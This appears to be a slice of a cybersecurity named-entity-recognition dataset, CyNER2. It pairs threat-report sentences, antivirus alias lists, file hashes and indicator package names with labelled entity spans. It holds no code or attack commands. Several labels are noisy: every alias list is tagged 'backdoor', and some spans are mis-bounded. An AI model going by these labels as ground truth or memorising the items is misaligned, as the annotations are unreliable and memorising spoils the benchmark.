{"text": "A backdoor also known as: Trojan-Dropper.Win32.Injector!O Trojan.Zusy.D2081E W32/MalwareS.BJCG Backdoor.Vinself.B Win32/Fuwu.A BKDR_COMFOO.SME Win.Trojan.Rootkit-9875 Trojan-Dropper.Win32.Injector.jndt Trojan.Win32.DPD.dxvfcr Trojan.PWS.DPD.5 BKDR_COMFOO.SME BehavesLike.Win32.RansomWannaCry.ch Trojan.Win32.Spy W32/Risk.KUNB-3887 Trojan:Win32/Netnam.B Trojan-Dropper.Win32.Injector.jndt Trj/Zbot.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004133", "source": "cyner2_train"}}
{"text": "This one-time cost provides a malicious customer with access to all the data on the server and endless other possibilities, such as using the access to launch further attacks.", "spans": {"THREAT_ACTOR: malicious customer": [[30, 48]], "SYSTEM: server": [[84, 90]]}, "info": {"id": "cyner2_train_004134", "source": "cyner2_train"}}
{"text": "Instead, they first attempt to gain access to the machine, most likely through a more targeted attack or exploit, before manually triggering and executing the malware.", "spans": {"SYSTEM: machine,": [[50, 58]], "MALWARE: exploit,": [[105, 113]], "MALWARE: malware.": [[159, 167]]}, "info": {"id": "cyner2_train_004135", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Stimilani.FC.1099 Trojan.Zusy.D2F64E HackTool:MSIL/Stimilani.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004136", "source": "cyner2_train"}}
{"text": "During the last hours, ESET researchers noticed that Eltima, the makers of the Elmedia Player software, have been distributing a version of their application trojanized with the OSX/Proton malware on their official website.", "spans": {"ORGANIZATION: ESET researchers": [[23, 39]], "ORGANIZATION: Eltima,": [[53, 60]], "SYSTEM: the Elmedia Player software,": [[75, 103]], "SYSTEM: application": [[146, 157]], "MALWARE: OSX/Proton malware": [[178, 196]]}, "info": {"id": "cyner2_train_004137", "source": "cyner2_train"}}
{"text": "It appears that these threat actors have begun using Palo Alto Networks upcoming Cyber Security Summit hosted on November 3, 2016 in Jakarta, Indonesia as a lure to compromise targeted individuals.", "spans": {"THREAT_ACTOR: threat actors": [[22, 35]], "ORGANIZATION: Palo Alto Networks": [[53, 71]], "ORGANIZATION: Cyber Security Summit": [[81, 102]]}, "info": {"id": "cyner2_train_004138", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.DoS.26816 DDOS_DEPCHARG.11 Win32.Trojan.WisdomEyes.16070401.9500.9967 W32/Trojan.ROMV-7068 DDOS_DEPCHARG.11 Win.Trojan.Chubby-2 Trojan-DDoS.Win32.DepthCharge.c Trojan.Win32.DepthCharge.dfzl Trojan.Win32.Chubby.26816 Troj.W32.Chubby.11!c Trojan.Chubby.11 Trojan.Chubby.Win32.2 BehavesLike.Win32.Fake.mc Backdoor/VB.dc TR/Chubby.11 Trojan[DDoS]/Win32.DepthCharge Trojan.Heur.VB.bmLfcmhTrPni Trojan-DDoS.Win32.DepthCharge.c TrojanDDoS.DepthCharge Win32/Chubby.11 Win32.Trojan-ddos.Depthcharge.Lpbl Trojan.DDoS.DepthCharge!wR+hD336kwM Trojan-DDoS.Win32.DepthCharge W32/Chubby.11!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004141", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Trojan.Vbcrypt Spyware.Zbot Dropper.Small.Win32.2729 Trojan/Dropper.Small.dil Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Droplet.GN Win.Trojan.VB-9953 Trojan-Dropper.Win32.Small.dil Trojan.Win32.Small.wfby TrojWare.Win32.TrojanDropper.Small.dil0 Trojan.MulDrop.30852 BehavesLike.Win32.Downloader.mc Trojan-Dropper.Win32.Delf Trojan[Spy]/Win32.Zbot Trojan.Heur.E2A3DF Dropper.Small.86866 Trojan-Dropper.Win32.Small.dil Trojan/Win32.Batat.R4771 W32/Dropper.DIL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004143", "source": "cyner2_train"}}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.network.android 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 516f8f516cc0fd8db53785a48c0a86554f75c3ba Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps .", "spans": {"MALWARE: Chrysaor": [[329, 337]], "MALWARE: Chrysaor-related": [[407, 423]]}, "info": {"id": "cyner2_train_004144", "source": "cyner2_train"}}
{"text": "The attacking IP addresses originated from very distinctive network ranges mostly associated with Chinese Internet service providers.", "spans": {"ORGANIZATION: Chinese Internet service providers.": [[98, 133]]}, "info": {"id": "cyner2_train_004146", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Multi Trojan.Win32.Inject.exdppy Trojan.Win32.Z.Kryptik.258107 Troj.W32.Virtumonde.mCBt Trojan.Inject.60399 Trojan.Kryptik.Win32.1344676 BehavesLike.Win32.Worm.dc Trojan:Win32/Kexject.A Spyware/Win32.Zbot.C145539 Trj/CI.A Win32.Trojan.Inject.Auto", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004147", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Hekdor.88576 Backdoor/Hekdor.a Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.EEXH-5977 Win32/Hekdor.A BKDR_HEKDOR.A Win.Trojan.HackersDoor-6351576-1 Backdoor.Win32.Hackdoor.12 Trojan.Win32.Hekdor.gtcj Backdoor.Win32.Hackdoor.88576 Backdoor.W32.Hackdoor.f!c Backdoor.Win32.Hackdoor.~dy001 BackDoor.Hackdoor.22 Backdoor.Hekdor.Win32.1 BehavesLike.Win32.Virut.mh Trojan.Win32.Hekdor Trojan[Backdoor]/Win32.Hackdoor Win32.Hack.Hekdor.a.kcloud Trojan.Graftor.Elzob.D2551 Backdoor.Win32.Hackdoor.12 Backdoor/Win32.Hackdoor.R101239 Bck/Iroffer.BG Win32.Backdoor.Hackdoor.Pegb Backdoor.Hekdor.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004148", "source": "cyner2_train"}}
{"text": "They find and share readily available code and use those to make their own malware.", "spans": {}, "info": {"id": "cyner2_train_004149", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/Win32.AutoRun", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004150", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Clicker.cysqcu Trojan.Click2.41012 TR/Storup.D.158 Trojan:Win32/Storup.D Trojan.Graftor.DA5F2 TrojanSpy.Gaxfid!V9zv1PzO78E Trojan.Win32.Spy Trj/CI.A Win32/Trojan.b34", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004153", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packer.W32.Katusha!c Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_TRACUR.SMVB Packed.Win32.Katusha.ac Trojan.Win32.Tracur.csqtnd Trojan.Win32.Z.Tracur.476672 TrojWare.Win32.Kryptik.BJLP TROJ_TRACUR.SMVB TR/Tracur.ujeuv Trojan/Win32.Diple Trojan.Mikey.D823E Packed.Win32.Katusha.ac Trojan/Win32.Tracur.R87716 Trojan.Tracur Win32/Boaxxe.BB Win32.Packed.Katusha.Aljh Trojan.Win32.Boaxxe Win32/Trojan.2ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004154", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DownloaderLTB.Trojan Trojan.Win32.Scar!O Trojan.Scar.20261 Trojan/Scar.gfdd Trojan.Graftor.Elzob.D3707 TROJ_DLOADE.SMEP Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/SillyDl.HER TROJ_DLOADE.SMEP Win.Trojan.Scar-864 Virus.Win32.Lamer.vpqnl Trojan.DownLoader22.5119 TR/Taranis.2688 Trojan/Win32.Scar Trojan.Win32.A.Scar.100616 Trojan/Win32.Scar.R4127 Trojan.Scar Trojan.Win32.Sisproc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004155", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Cadlotcorg Trojan.DistTrack.stdr BKDR_DISTTRACK.E Win.Malware.StoneDrill-6012379-0 Trojan.Win32.Inject.wmyt Trojan.Win32.Inject.ekcbzj Trojan.Win32.Z.Inject.195072 Troj.W32.Inject!c Trojan.Stoned.5 Trojan.StoneDrill.Win32.2 BKDR_DISTTRACK.E W32/Trojan.CWLD-3265 Trojan.Inject.uoh TR/Injector.sgcfh Trojan/Win32.Inject Trojan.Razy.D1AF37 Trojan.Win32.Inject.wmyt Trojan:Win32/Cadlotcorg.A!dha Trojan/Win32.Injector.C1695778 Trojan.DiskWriter Trj/CI.A Win32/StoneDrill.A Win32.Trojan.Inject.Eddh Trojan.Inject!MGtoNAyL21Q Trojan.Win32.Cadlotcorg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004156", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win32.VirRansom.pc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004159", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Iframer.77312 Trojan.Iframer.aa Trojan.Win32.Iframer.aa Trojan/Iframer.aa Trojan.Iframer.X W32/DLoader.OAFQ Trojan.Win32.Iframer.aa TrojWare.Win32.Iframer.aa Trojan.Win32.Iframer.aa Trojan/Iframer.b Trojan.Win32.Iframer!IK Trojan:Win32/Ifrasif.A Trojan.Win32.Iframer.aa Trojan.Win32.Iframer", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004160", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kazy.D1DA5C Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.Steam.cwybnb TrojWare.Win32.PSW.Steathie.B2 Trojan.PWS.Steam.292 TR/PSW.Steathie.B PWS:MSIL/Pasdael.A W32/Sc!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004162", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PSW.Vorbeld.B Trojan/W32.Ikmet.307200 Trojan.PSW.Vorbeld.B Troj.IM.W32.Ikmet.e!c Trojan/Ikmet.e Trojan.PSW.Vorbeld.B TROJ_VORBELD.B TROJ_VORBELD.B Trojan.PSW.Vorbeld.B Trojan-IM.Win32.Ikmet.e Trojan.PSW.Vorbeld.B Trojan.Win32.Ikmet.diag Win32.Trojan-im.Ikmet.Lfzq Trojan.PSW.Vorbeld.B TrojWare.Win32.PSW.Vorbeld.B Trojan.PSW.Vorbeld.B Trojan.PWS.Special.11 Trojan.Ikmet.Win32.2 BehavesLike.Win32.Fareit.fz W32/Risk.ZFPE-4855 Trojan/PSW.Vorbeld.b TR/PSW.Vorbeld.b Trojan[IM]/Win32.Ikmet Win32.Troj.Vorbeld.b.kcloud PWS:Win32/Vorbeld.B Trojan-IM.Win32.Ikmet.e TScope.Trojan.VB Win32/PSW.Vorbeld.B Trojan.Ikmet!CCqyhhL0iag Backdoor.VB W32/Vorbeld.E!tr Win32/Trojan.IM.00b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004164", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.OnlineGames.AAGG Trojan.Magania.19302 Trojan.PWS.OnlineGames.AAGG TSPY_ONLINEG.IGO Win32.Trojan.WisdomEyes.16070401.9500.9932 Infostealer.Onlinegame Win32/Frethog.CIL TSPY_ONLINEG.IGO Win.Spyware.59235-2 Trojan-GameThief.Win32.OnLineGames.txbo Trojan.PWS.OnlineGames.AAGG Trojan.Win32.OnLineGames.lhee Troj.PSW32.W.QQPass.lpXN Trojan.PWS.OnlineGames.AAGG TrojWare.Win32.Trojan.Inject.~II Trojan.PWS.OnlineGames.AAGG Trojan.MulDrop4.15206 PWS-OnlineGames.co Trojan/PSW.OnLineGames.auru Trojan[GameThief]/Win32.WOW.gic Win32.Troj.OnlineGames.sd.kcloud Trojan.PWS.OnlineGames.AAGG Trojan.Win32.PSWIGames.11924.B Trojan.PWS.OnlineGames.AAGG Trojan/Win32.OnlineGameHack.C909 TrojanPSW.OnLineGames.nr Trojan-Spy.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004167", "source": "cyner2_train"}}
{"text": "Cyphort has been monitoring how threat actors are exploiting computing resources from compromised victims to mine various crypto currencies.", "spans": {"ORGANIZATION: Cyphort": [[0, 7]], "THREAT_ACTOR: threat actors": [[32, 45]], "SYSTEM: exploiting computing": [[50, 70]]}, "info": {"id": "cyner2_train_004168", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Toxic.a BehavesLike.Win32.BadFile.jc Trojan.Win32.Ransom.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004169", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanRansom.Blocker Ransom_Blocker.R0C1C0DHU17 Win32.Trojan.WisdomEyes.16070401.9500.9605 Ransom_Blocker.R0C1C0DHU17 Trojan-Ransom.Win32.Blocker.kgrm Troj.Ransom.W32.Blocker!c BehavesLike.Win32.RansomCerber.gh W32/Trojan.DOGS-7123 W32.Trojan.Backdoor TR/Crypt.ZPACK.hmkaa Trojan-Ransom.Win32.Blocker.kgrm Trojan/Win32.Dapato.C1720332 Hoax.Blocker Trojan.Dropper Trj/CI.A Win32.Trojan.Blocker.Akzg Trojan.Blocker!U13z+V78Arg Win32/Trojan.Ransom.acc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004171", "source": "cyner2_train"}}
{"text": "Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context.", "spans": {"ORGANIZATION: Kaspersky researchers": [[49, 70]], "ORGANIZATION: the international community": [[75, 102]]}, "info": {"id": "cyner2_train_004172", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win.Trojan.Dadobra-446 Trojan-Downloader.Win32.Banload.bnlx Trojan.Win32.Downloader.337408.M TrojWare.Win32.TrojanDownloader.Dadobra.~JK Trojan.DownLoader5.10443 Trojan-Downloader.Win32.Banload TrojanDownloader.Banload.bhs Trojan[Downloader]/Win32.Banload Trojan-Downloader.Win32.Banload.bnlx Trojan:Win32/Banload.A Downloader/Win32.Banload.C108589 Win32/Spy.Banker.WNS Win32.Trojan-downloader.Banload.Ebhk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004175", "source": "cyner2_train"}}
{"text": "Let's examine a couple of interesting delivery techniques from an APT active for the past several years, the Spring Dragon APT.", "spans": {"THREAT_ACTOR: APT": [[66, 69]], "THREAT_ACTOR: Spring Dragon APT.": [[109, 127]]}, "info": {"id": "cyner2_train_004178", "source": "cyner2_train"}}
{"text": "SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010.", "spans": {"MALWARE: SunOrcal": [[0, 8]], "SYSTEM: the C2s,": [[98, 106]]}, "info": {"id": "cyner2_train_004180", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TSPY_MALUMPOS.SM TSPY_MALUMPOS.SM Win.Trojan.MalumPOS-1 TR/AD.Siaacsia.ielmw Trojan:Win32/Malumpos.A Trojan/Win32.Malumpos.C1727078 Trojan-Spy.MalumPOS Win32/Trojan.Spy.958", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004181", "source": "cyner2_train"}}
{"text": "An aside: the rootkit does appear to be named after the Pokémon of the same name.", "spans": {"MALWARE: rootkit": [[14, 21]]}, "info": {"id": "cyner2_train_004183", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Hacktool.EH Trojan/W32.HackTool.215552 Trojan.Mauvaise.SL1 Win.Tool.Wincred-6333920-0 Application.Hacktool.EH HackTool.Win64.WinCred.c Application.Hacktool.EH Application.Hacktool.EH Tool.WinCred.1 BehavesLike.Win64.BrowseFox.dh W64/Application.WFWG-6345 Application.Hacktool.EH HackTool.Win64.WinCred.c Application.Hacktool.EH HackTool.Win64 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004184", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Dapato.26112 Trojan-Dropper.Win32.Dapato!O BackdoorAPT.Hikiti.G4 Win32.Trojan.WisdomEyes.16070401.9500.9983 Backdoor.Trojan BKDR_FEXEL.MM Backdoor.Win32.Fexel.b Trojan.Win32.Dapato.ceuzkz Trojan.DownLoader10.12491 BehavesLike.Win32.Downloader.mc Trojan.Win32.Farfli W32/Backdoor.QCOF-8324 Trojan[Dropper]/Win32.Dapato Trojan.Heur.E97E22 Troj.Dropper.W32.Dapato.dawi!c Backdoor.Win32.Fexel.b Backdoor:Win32/Hikiti.G!dha Dropper/Win32.Dapato.C199271 Win32.Backdoor.Fexel.Wvkt Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004186", "source": "cyner2_train"}}
{"text": "It is assumed that actors using the malware are targeting small- to medium-sized businesses given the malware's focus on VNC applications.", "spans": {"THREAT_ACTOR: actors": [[19, 25]], "MALWARE: malware": [[36, 43]], "ORGANIZATION: small- to medium-sized businesses": [[58, 91]], "MALWARE: malware's": [[102, 111]], "SYSTEM: VNC applications.": [[121, 138]]}, "info": {"id": "cyner2_train_004188", "source": "cyner2_train"}}
{"text": "In spite of these commonalities, we have not identified any firm links between the two groups.", "spans": {}, "info": {"id": "cyner2_train_004189", "source": "cyner2_train"}}
{"text": "This new wave of attacks has also used some infrastructure that has previously been used in Carbanak campaigns.", "spans": {"SYSTEM: infrastructure": [[44, 58]], "THREAT_ACTOR: Carbanak campaigns.": [[92, 111]]}, "info": {"id": "cyner2_train_004191", "source": "cyner2_train"}}
{"text": "“ The takeaway ? Internet users should keep on securing their activities with good security solutions for both computers and mobile devices. ” Hashes : E5212D4416486AF42E7ED1F58A526AEF77BE89BE A9891222232145581FE8D0D483EDB4B18836BCFC AFF9F39A6CA5D68C599B30012D79DA29E2672C6E Insidious Android malware gives up all malicious features but one to gain stealth ESET researchers detect a new way of misusing Accessibility Service , the Achilles ’ heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim ’ s bank account or cryptocurrency wallet and taking over their email or social media accounts .", "spans": {"SYSTEM: Android": [[285, 292], [450, 457], [543, 550]], "ORGANIZATION: ESET": [[357, 361], [489, 493]]}, "info": {"id": "cyner2_train_004193", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ArchSMS!Tf0HkXJW05g Hoax.Win32.ArchSMS.hqqg Hoax.ArchSMS.hqqg SecurityRisk.PremiumSMSScam Hoax.Win32.ArchSMS Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004194", "source": "cyner2_train"}}
{"text": "The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used.", "spans": {"MALWARE: family": [[8, 14]]}, "info": {"id": "cyner2_train_004195", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Koutodoor!IK Backdoor:Win32/Koutodoor.B Backdoor.Win32.Koutodoor.da SHeur2.AIKX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004197", "source": "cyner2_train"}}
{"text": "The StreamEx family has the ability to access and modify the user's file system, modify the registry, create system services, enumerate process and system information, enumerate network resources and drive types, scan for security tools such as firewall products and antivirus products, change browser security settings, and remotely execute commands.", "spans": {"MALWARE: The StreamEx family": [[0, 19]], "SYSTEM: user's file system,": [[61, 80]], "SYSTEM: system": [[109, 115], [148, 154]], "SYSTEM: network": [[178, 185]], "SYSTEM: firewall products": [[245, 262]], "SYSTEM: antivirus products,": [[267, 286]]}, "info": {"id": "cyner2_train_004199", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Comfold Trojan:Win32/Comfold.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004201", "source": "cyner2_train"}}
{"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo 佐川急便 cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 jp.co.sagawa.SagawaOfficialApp 佐川急便 Malicious URLs : hxxp : //38 [ .", "spans": {"ORGANIZATION: Facebook": [[307, 315]]}, "info": {"id": "cyner2_train_004203", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.AutoRun.Win32.132231 Win32.Trojan.ServStart.a Win.Trojan.Qhost-160 Trojan.Win32.AutoRun.cvpwhj Trojan.DownLoader4.40333 BehavesLike.Win32.Ipamor.lm TR/Dldr.JKCN Trojan/Win32.Downloader.C40577 Trojan.Win32.Wc Win32/AutoRun.PT Trojan-Proxy.Win32.Ranky", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004204", "source": "cyner2_train"}}
{"text": "The handful of malicious features densely packed in this new malware also includes the ability to drop other malware.", "spans": {"MALWARE: malicious": [[15, 24]], "MALWARE: malware": [[61, 68]], "MALWARE: malware.": [[109, 117]]}, "info": {"id": "cyner2_train_004205", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ShipBHQc.Trojan Trojan.Win32.ShipUp!O TrojanPWS.Zbot.Y Trojan/Kryptik.awzk Trojan.Razy.D3C5B TROJ_KRYPTK.SML3 Win.Trojan.Redirect-6055402-0 Trojan.Win32.ShipUp.brmnrc Trojan.Redirect.140 Trojan.ShipUp.Win32.1152 TROJ_KRYPTK.SML3 BehavesLike.Win32.PWSZbot.dh Trojan.Win32.ShipUp Trojan/ShipUp.ix TR/Rogue.kdz.11287.3 Trojan/Win32.ShipUp TrojanDropper:Win32/Gepys.A Troj.W32.ShipUp.lINm Trojan/Win32.Shipup.R58491 TScope.Malware-Cryptor.SB Trojan.FakeMS.ED W32/Kryptik.AYTK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004209", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy.Win32.Tibia!O Win32.Trojan.WisdomEyes.16070401.9500.9963 Trojan.Win32.Drop.cbndjf Trojan.MulDrop3.1226 BehavesLike.Win32.BadFile.rc Trojan-Dropper.Win32.Monya TR/Drop.Tibdef.B Trojan.Raldhep.1 TrojanDropper:Win32/Tibdef.B W32/Dropper.AAAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004210", "source": "cyner2_train"}}
{"text": "It is in use by the Molerats aka Gaza cybergang, a politically motivated group whose main objective, we believe, is intelligence gathering.", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang,": [[33, 48]], "THREAT_ACTOR: politically motivated group": [[51, 78]]}, "info": {"id": "cyner2_train_004211", "source": "cyner2_train"}}
{"text": "The Magnitude exploit kit has been using an XML configuration file critical to retrieving the malware payload Cerber for several months already.", "spans": {"MALWARE: The Magnitude exploit kit": [[0, 25]], "MALWARE: the malware payload Cerber": [[90, 116]]}, "info": {"id": "cyner2_train_004212", "source": "cyner2_train"}}
{"text": "Here is Forcepoint Security Labs we have seen a number of changes and improvements over the last few months.", "spans": {"ORGANIZATION: Forcepoint Security Labs": [[8, 32]]}, "info": {"id": "cyner2_train_004213", "source": "cyner2_train"}}
{"text": "The actors compromised the sites of a local television network, educational organizations, a religious institute, and a known political party in Taiwan; and a popular news site in Hong Kong.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "ORGANIZATION: local television network, educational organizations, a religious institute,": [[38, 113]], "ORGANIZATION: a known political party": [[118, 141]], "ORGANIZATION: a popular news site": [[157, 176]]}, "info": {"id": "cyner2_train_004214", "source": "cyner2_train"}}
{"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok was somewhat pared down compared to the Russian one .", "spans": {"SYSTEM: Google Play": [[75, 86]]}, "info": {"id": "cyner2_train_004216", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.O W32/Trojan2.OALA W32.Virut.CF Win32/Virut.17408 PE_VIRUX.O Win32.Virus.Virut.Q Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 BehavesLike.Win32.Virut.cc W32/Trojan.JXET-3602 Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.cr.61440 W32.Virut.lM6H Virus.Win32.Virut.ce TrojanClicker:MSIL/Xobnff.A Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Virus.Win32.Virut W32/Virut.CE Virus.Win32.Virut.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004218", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Zegost.FC.2167 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.DownLoader22.48526 BehavesLike.Win32.Trojan.cc Trojan.MSIL.Bladabindi.1 MSIL/Injector.PJG!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004219", "source": "cyner2_train"}}
{"text": "Sinkhole data explained below shows just how quickly this campaign is impacting victims.", "spans": {"THREAT_ACTOR: campaign": [[58, 66]]}, "info": {"id": "cyner2_train_004222", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Netstop.A Trojan.Netstop.A Backdoor.Trojan Win32/Noshare.N TROJ_NETSTOPA.A Trojan.Netstop.A Trojan.Win32.Netstop.dyylkw Win32.Trojan-spy.Gc.Hsii Trojan.Netstop.A Worm.Win32.SpyBot.GC Trojan.Netstop.A Email-Worm.Win32.GOPworm.196 TROJ_NETSTOPA.A TR/Netstop.A Trojan.Netstop.A Trojan.Netstop.A Email-Worm.Win32.GOPworm.196 Win32/SpyBot.GC Worm.SpyBot!FiFtixQJKm8 W32/Netstop.A!tr Bck/Secur.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004223", "source": "cyner2_train"}}
{"text": "FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT32": [[22, 27]], "MALWARE: malware,": [[71, 79]], "MALWARE: tools,": [[123, 129]], "THREAT_ACTOR: operations": [[150, 160]]}, "info": {"id": "cyner2_train_004224", "source": "cyner2_train"}}
{"text": "In recent years, the detention and interrogation of members of online communities has been publicized by state media for propaganda purposes.", "spans": {"ORGANIZATION: members": [[52, 59]], "ORGANIZATION: online communities": [[63, 81]], "ORGANIZATION: state media": [[105, 116]]}, "info": {"id": "cyner2_train_004227", "source": "cyner2_train"}}
{"text": "PaloAlto Unit 42 researchers have observed a new Remote Access Tool RAT constructed by an unknown actor of Italian origin.", "spans": {"ORGANIZATION: PaloAlto Unit 42 researchers": [[0, 28]], "MALWARE: Remote Access Tool RAT": [[49, 71]], "THREAT_ACTOR: unknown actor": [[90, 103]]}, "info": {"id": "cyner2_train_004228", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Inject.IA Trojan.Skeeyah.8818 Infostealer.Kegotip!gm TSPY_KEGOTIP.SMA Trojan.Inject.IA Trojan-PSW.Win32.Minari.a Trojan.Inject.IA Trojan.Inject.IA Trojan.Inject.IA Trojan.PWS.Stealer.2518 TSPY_KEGOTIP.SMA BehavesLike.Win32.Backdoor.ch Trojan[PSW]/Win32.Minari Trojan.Inject.IA Trojan-PSW.Win32.Minari.a Trojan/Win32.PWS.R100577 Trojan.Inject.IA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004229", "source": "cyner2_train"}}
